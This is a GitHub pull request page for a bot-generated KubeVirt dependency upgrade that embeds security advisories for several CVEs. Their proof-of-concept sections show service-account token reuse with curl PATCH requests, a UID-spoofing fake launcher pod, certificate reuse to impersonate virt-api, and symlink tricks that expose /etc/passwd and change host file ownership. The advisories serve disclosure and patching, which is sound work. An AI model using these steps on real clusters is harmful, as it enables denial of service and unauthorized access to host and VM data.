chore(deps): update module kubevirt.io/kubevirt to v1.7.0 [security] (release-v0.24) #773
Conversation
Signed-off-by: null <[email protected]>
[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: redhat-renovate-bot. The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files. Approvers can indicate their approval by writing `/approve` in a comment.
@redhat-renovate-bot: The following tests failed, say `/retest` to rerun all failed tests:

Full PR test history. Your PR dashboard. Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.
/close
@ksimon1: Closed this PR. In response to this: `/close`

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository.
Renovate Ignore Notification: Because you closed this PR without merging, Renovate will ignore this update (v1.7.0). If you accidentally closed this PR, or if you changed your mind, rename this PR to get a fresh replacement PR.
This PR contains the following updates:
kubevirt.io/kubevirt: `v1.4.0` -> `v1.7.0`

GitHub Vulnerability Alerts
CVE-2025-64436
Summary
The permissions granted to the `virt-handler` service account, such as the ability to update VMIs and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.

Details
Following the GitHub security advisory published on March 23, 2023, a `ValidatingAdmissionPolicy` was introduced to impose restrictions on which sections of node resources the `virt-handler` service account can modify. For instance, the `spec` section of nodes has been made immutable, and modifications to the `labels` section are now limited to `kubevirt.io`-prefixed labels only. This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

However, if a `virt-handler` service account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably, `virt-handler` sets a specific `kubevirt.io` boolean label, `kubevirt.io/schedulable`, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label to `false`, thereby forcing all VMI instances to be scheduled exclusively on the compromised node.

Another finding describes how a compromised `virt-handler` instance can perform operations on other nodes that are intended to be executed solely by `virt-api`. This significantly increases both the impact and the likelihood of the vulnerability being exploited.

Additionally, by default, the `virt-handler` service account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet's `NodeRestriction` feature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.

PoC
By injecting incorrect data into a running VMI, for example by altering the `kubevirt.io/nodeName` label to reference a different node, the VMI is marked as terminated and its state transitions to `Succeeded`. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker's choosing. As an example, the following demonstrates how to instantiate a basic VMI.
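A minimal sketch of such a VMI, assuming a CirrOS container disk (the name `testvm` matches the transcript below):

```yaml
# Hypothetical minimal VMI manifest for the demonstration.
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: testvm
spec:
  domain:
    devices:
      disks:
        - name: containerdisk
          disk:
            bus: virtio
    resources:
      requests:
        memory: 128Mi
  volumes:
    - name: containerdisk
      containerDisk:
        image: quay.io/kubevirt/cirros-container-disk-demo
```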
The VMI is then created on a minikube node identified with `minikube-m02`:

```
operator@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   20s   Running   10.244.1.8   minikube-m02   True
```

Assume that a `virt-handler` pod, running on node `minikube-m03`, is compromised and that the attacker wants `testvm` to be re-deployed on a node they control.

First, we retrieve the `virt-handler` service account token in order to be able to perform requests to the Kubernetes API. The attacker then updates the VMI object's labels in a way that makes it terminate, as sketched below.
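A minimal sketch of these two steps, assuming shell access inside the compromised `virt-handler` pod (namespace `default` and the in-cluster API address are assumptions):

```bash
# Hypothetical sketch: read the service account token mounted into the
# compromised virt-handler pod.
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc

# Patch the VMI's kubevirt.io/nodeName label to reference a different node,
# after which the VMI is reported as terminated (Succeeded).
curl -sk -X PATCH \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/merge-patch+json" \
  "$APISERVER/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm" \
  -d '{"metadata":{"labels":{"kubevirt.io/nodeName":"minikube-m03"}}}'
```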
Now, the attacker can use the excessive permissions of the `virt-handler` service account to patch the `minikube-m02` node in order to mark it as unschedulable for VMI workloads, as sketched below. Note that this request could require multiple invocations, as `virt-handler` continuously updates the schedulable state of the node it is running on.
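A hedged sketch of the node patch, reusing the token from the previous step (the request shape is an assumption):

```bash
# Hypothetical sketch: flip the kubevirt.io/schedulable label on
# minikube-m02 to "false" so it is avoided for VMI workloads.
curl -sk -X PATCH \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/merge-patch+json" \
  "$APISERVER/api/v1/nodes/minikube-m02" \
  -d '{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}'
```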
Finally, an admin user decides to restart the VMI.

Identifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the `userInfo` object, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes' `NodeRestriction` feature gate. Since Kubernetes version 1.32, the `node` authorization mode, enforced via the `NodeRestriction` admission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.

An alternative approach would be to create a dedicated `virt-handler` service account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from the `userInfo.username` field of the `AdmissionRequest` object. However, this method introduces additional operational overhead in terms of monitoring and maintenance.

Impact
This vulnerability allows an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.
CVE-2025-64435
Summary
A logic flaw in the `virt-controller` allows an attacker to disrupt control over a running VMI by creating a pod with the same labels as the legitimate `virt-launcher` pod associated with the VMI. This can mislead the `virt-controller` into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial of Service).

Details
A vulnerability has been identified in the logic responsible for reconciling the state of a VMI. Specifically, it is possible to associate a malicious, attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate `virt-launcher` pod associated with the VMI.

The `virt-launcher` pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with `virt-handler`, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).

When `virt-controller` receives a notification about a change in a VMI's state, it attempts to identify the corresponding `virt-launcher` pod. This is necessary in several scenarios, including updating the VMI based on its `virt-launcher` pod and performing operations on the `virt-launcher` pod's cgroups.
The core issue lies in the implementation of the `GetControllerOf` function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate `virt-launcher`, thereby compromising the VMI's integrity and control mechanisms.

The current logic assumes that a `virt-launcher` pod associated with a VMI may not always have a `controllerRef`. In such cases, the controller falls back to inspecting the pod's labels. Specifically, it evaluates the `kubevirt.io/created-by` label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the `virt-controller` selects the most recently created one.

This logic appears to be designed with migration scenarios in mind, where it is expected that two `virt-launcher` pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, no scenario was identified in which a legitimate `virt-launcher` pod lacks a `controllerRef` and relies solely on labels (such as `kubevirt.io/created-by`) to indicate its association with a VMI.

This fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate `virt-launcher` pod. As a result, the `CurrentVMIPod` function could mistakenly return the attacker-controlled pod instead of the authentic one.

This vulnerability has at least two serious consequences; among them, the attacker-controlled pod is not subject to constraints such as `nodeSelector` or `nodeAffinity`, which are typically used to enforce workload placement policies.

PoC
Consider a VMI definition similar to the basic `testvm` above; its UID can be read from `metadata.uid`, for example as sketched below.
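Retrieving the UID with standard `kubectl`:

```bash
# Read the target VMI's UID; this is the value a legitimate virt-launcher
# pod carries in its kubevirt.io/created-by label.
kubectl get vmi testvm -o jsonpath='{.metadata.uid}'
```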
The UID of the VMI can also be found as an argument to the container in the `virt-launcher` pod.

Consider the following attacker-controlled pod, which is associated with the VMI using the UID defined in the `kubevirt.io/created-by` label, as sketched below. To effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop.
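A hedged sketch of such a pod; the UID value is a placeholder and the exact label set is an assumption:

```yaml
# Hypothetical fake "launcher" pod. Its kubevirt.io/created-by label carries
# the UID of the target VMI, mimicking a legitimate virt-launcher pod.
apiVersion: v1
kind: Pod
metadata:
  name: fake-launcher
  labels:
    kubevirt.io: virt-launcher
    kubevirt.io/created-by: "11111111-2222-3333-4444-555555555555"  # target VMI UID
spec:
  containers:
    - name: sleeper
      image: busybox
      command: ["sleep", "infinity"]
```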
To illustrate the impact of this vulnerability, a race condition will be triggered in the `sync` function of the VMI controller. The relevant code adds additional annotations to the `virt-launcher` pod related to node eviction. This happens via an API call to Kubernetes which, upon success, returns a new, updated pod object; this object replaces the current one in the execution flow.

There is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed. To trigger it, the attacker should update the `fake-launcher` pod's annotations before the check `vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)` in `sync`, and between the check `if !isTempPod(pod) && controller.IsPodReady(pod)` in `sync` and the patch API call in `syncPodAnnotations`, as sketched below. This annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI, as the latter is already running (provisioning happens before the VMI starts running).
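A hedged sketch of the annotation update; the annotation key is an assumption about what `isTempPod` checks for:

```bash
# Hypothetical sketch: annotate the fake pod so that isTempPod() treats it
# as an ephemeral provisioning pod, failing the already-running VMI.
kubectl annotate pod fake-launcher kubevirt.io/ephemeral-provisioning=true
```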
The update should also happen during the reconciliation loop, when the `fake-launcher` pod is initially going to be associated with the VMI and its eviction-related labels are updated.

Upon successful exploitation, the VMI is marked as failed and can no longer be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster.
Impact
As a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.
KubeVirt's Improper TLS Certificate Management Handling Allows API Identity Spoofing
CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107
Details
Summary
Due to improper TLS certificate management, a compromised `virt-handler` could impersonate `virt-api` by using its own TLS credentials, allowing it to initiate privileged operations against another `virt-handler`.

Details
Because of improper TLS certificate management, a compromised `virt-handler` instance can reuse its TLS bundle to impersonate `virt-api`, enabling unauthorized access to VM lifecycle operations on other `virt-handler` nodes.

The `virt-api` component acts as a sub-resource server, and it proxies API VM lifecycle requests to `virt-handler` instances.

The communication between `virt-api` and `virt-handler` instances is secured using mTLS. The former acts as a client while the latter acts as the server. The client certificate used by `virt-api` is defined in the source code and carries the properties discussed below.

The `virt-handler` component verifies the signature of client certificates using a self-signed root CA. The latter is generated by `virt-operator` when the KubeVirt stack is deployed, and it is stored within a ConfigMap in the `kubevirt` namespace. This ConfigMap is used as a trust anchor by all `virt-handler` instances to verify client certificates.

The `kubevirt-ca` is also used to sign the server certificate which is used by a `virt-handler` instance.

In addition to the validity of the signature, the `virt-handler` component also verifies the CN field of the presented certificate (see `sec.SetupTLSForVirtHandlerServer`).
This check illustrates that client certificates accepted by KubeVirt must have as CN `kubevirt.io:system:client:virt-handler`, which is the same as the CN present in `virt-api`'s certificate. However, the latter is not the only component in the KubeVirt stack which can communicate with a `virt-handler` instance.
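The CN overlap can be checked directly on the certificate bundles; a hedged sketch, assuming they have been extracted to local files:

```bash
# Hypothetical sketch: both subjects show the same CN,
# kubevirt.io:system:client:virt-handler.
openssl x509 -in virt-api-client.crt     -noout -subject
openssl x509 -in virt-handler-client.crt -noout -subject
```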
virt-handlercan communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, thevirt-handlers on both nodes are going to use structures calledProxyManagerto communicate back and forth on the state of the migration.This communication follows a classical client-server model, where the
virt-handleron the migration source node acts as a client and thevirt-handleron the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by thevirt-handleracting as a migration destination node is the same as the one which is used for the communication between the samevirt-handlerand thevirt-apiin the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by avirt-handlerinstance has the same CN as the client certificate used byvirt-api.Although the migration procedure, where two separate
virt-handlerinstances coordinate the transfer of a VM's state, is not directly tied to the communication betweenvirt-apiandvirt-handlerduring VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificate used by bothvirt-handlerandvirt-apishares the same CN field, despite the use of different, randomly allocated ports, for the two types of communication.PoC
To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (`minikube` and `minikube-m02`), and thus with two `virt-handler` instances, alongside a VMI running on one of the nodes. It is assumed that an attacker has obtained access to the client certificate bundle used by the `virt-handler` instance running on the compromised node (`minikube`) while the virtual machine is running on the other node (`minikube-m02`). Thus, they can interact with the sub-resource API exposed by the other `virt-handler` instance and control the lifecycle of the VMs running on that node, as sketched below.
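A hedged sketch of such an interaction; the host, port, and URL path are assumptions:

```bash
# Hypothetical sketch: reuse the stolen virt-handler client certificate
# (its CN matches the one virt-api presents) against the sub-resource
# API served by the virt-handler on minikube-m02.
curl -sk \
  --cert virt-handler-client.crt --key virt-handler-client.key \
  --cacert kubevirt-ca.crt \
  -X PUT \
  "https://<minikube-m02-ip>:<virt-handler-port>/v1/namespaces/default/virtualmachineinstances/testvm/pause"
```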
Impact
Due to the peer verification logic in `virt-handler` (via `verifyPeerCert`), an attacker who compromises a `virt-handler` instance could exploit these shared credentials to impersonate `virt-api` and execute privileged operations against other `virt-handler` instances, potentially compromising the integrity and availability of the VMs they manage.

Severity
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

References
This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).
KubeVirt Arbitrary Container File Read
CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109
Details
Summary
Mounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the `virt-launcher` pod. This is due to erroneous handling of symlinks defined within a PVC.

Details
A vulnerability was discovered that allows a VM to read arbitrary files from the `virt-launcher` pod's file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the `virt-launcher` pod's file system. Since `libvirt` can treat regular files as block devices, any file on the pod's file system that is symlinked in this way can be mounted into the VM and subsequently read.

Although a security mechanism exists where VMs are executed as an unprivileged user with UID `107` inside the `virt-launcher` container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (CVE-2025-64437, described below). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID `107` prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the `virt-launcher` pod's file system or on a mounted PVC from within the guest VM.

PoC
Consider that an attacker has control over the contents of two PVCs (e.g., from within a container) and creates symlinks inside them.

By default, Minikube's storage controller (`hostpath-provisioner`) will allocate each claim as a directory on the host node (`HostPath`). Once these Kubernetes resources are created, the user can create the symlinks within the PVCs, as sketched below.
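A hedged sketch of the symlink creation, assuming the two claims are mounted at `/pvc1` and `/pvc2` inside the `dual-pvc-pod` container (mount points and target paths are assumptions):

```bash
# Hypothetical sketch, run inside dual-pvc-pod. disk.img is the file name
# KubeVirt expects on a filesystem-mode PVC; here each one is a symlink
# that will later resolve inside the virt-launcher pod's file system.
ln -s /etc/passwd /pvc1/disk.img
ln -s /var/run/libvirt/qemu/default_arbitrary-container-read.xml /pvc2/disk.img
```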
Of course, these links could potentially be broken, as the files, especially `default_arbitrary-container-read.xml`, might not exist on the `dual-pvc-pod` pod's file system. The attacker then deploys the following VM, in which the two PVCs will be mounted as volumes in "filesystem" mode; a hedged excerpt follows.
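A hedged excerpt of the VM manifest's volume section (claim names are assumptions):

```yaml
# Hypothetical excerpt: both attacker-controlled PVCs are attached as
# filesystem-mode persistentVolumeClaim volumes, so KubeVirt looks for a
# disk.img file inside each claim.
volumes:
  - name: pvc-one
    persistentVolumeClaim:
      claimName: attacker-pvc-1
  - name: pvc-two
    persistentVolumeClaim:
      claimName: attacker-pvc-2
```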
From the documentation of the different volume modes, one can infer that if the backing `disk.img` is not owned by the unprivileged user with UID `107`, the VM should fail to mount it. In addition, this backing file is expected to be in RAW format. While this format can contain pretty much anything, we consider that being able to mount a file from the file system of `virt-launcher` is not the expected behaviour. After applying the VM manifest, the guest can read the `/etc/passwd` and `default_migration.xml` files from the `virt-launcher` pod's file system.

Impact
This vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.
Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

References
This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt
CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103
Details
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt
Severity
Unknown
References
This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).
KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes
CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102
Details
Summary
It is possible to trick the `virt-handler` component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID `107`, due to mishandling of symlinks when determining the root mount of a `virt-launcher` pod.

Details
In the current implementation, `virt-handler` does not verify whether the `launcher-sock` is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID `107` (the same user used by `virt-launcher`), thus compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.

To successfully exploit this vulnerability, an attacker should be in control of the file system of the `virt-launcher` pod.

PoC
In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:

- A symlinked launcher socket (`launcher-sock`) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.
- A symlinked disk image (`disk.img`) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem.

It is assumed that an attacker has access to a `virt-launcher` pod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of the `qemu` user (UID `107`). It is also assumed that they can create unprivileged user namespaces:

```
admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1
```

The setup below is inspired by an article in which the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.
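A hedged sketch of such an environment, assuming an Alpine root file system extracted to `./alpine-rootfs` with a UNIX-socket-capable tool such as `socat` inside it:

```bash
# Hypothetical sketch: enter fresh user/mount/PID namespaces and chroot
# into the Alpine rootfs to obtain an isolated shell.
unshare --user --map-root-user --mount --pid --fork \
  chroot ./alpine-rootfs /bin/sh

# Inside the isolated shell: listen on the UNIX socket that launcher-sock
# will later point to.
socat UNIX-LISTEN:/tmp/bad.sock,fork - &
```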
After the environment is set up, the `launcher-sock` in the `virt-launcher` container should be replaced with a symlink to `../../../../../../../../../proc/2245509/root/tmp/bad.sock` (2245509 is the PID of the above isolated shell process). This must be done, however, at the right moment: for this demonstration, it was decided to trigger the bug by leveraging a race condition when creating or updating a VMI. A basic VMI manifest, such as the one shown earlier, is applied to trigger the bug.
Just before the corresponding code path executes, the attacker should replace the `launcher-sock` with a symlink to the `bad.sock` controlled by the isolated process, as sketched below.
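A hedged sketch of the swap, assuming a shell inside the `virt-launcher` pod and that the socket lives under `/var/run/kubevirt` (the path is an assumption):

```bash
# Hypothetical sketch: replace the launcher socket with a symlink that
# escapes into the attacker's isolated process via /proc/<pid>/root.
cd /var/run/kubevirt
mv launcher-sock launcher-sock.bak
ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock launcher-sock
```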
Upon successful exploitation, `virt-handler` connects to the attacker-controlled socket, misinterprets the root mount, and changes the ownership of the host's `/etc/passwd` file.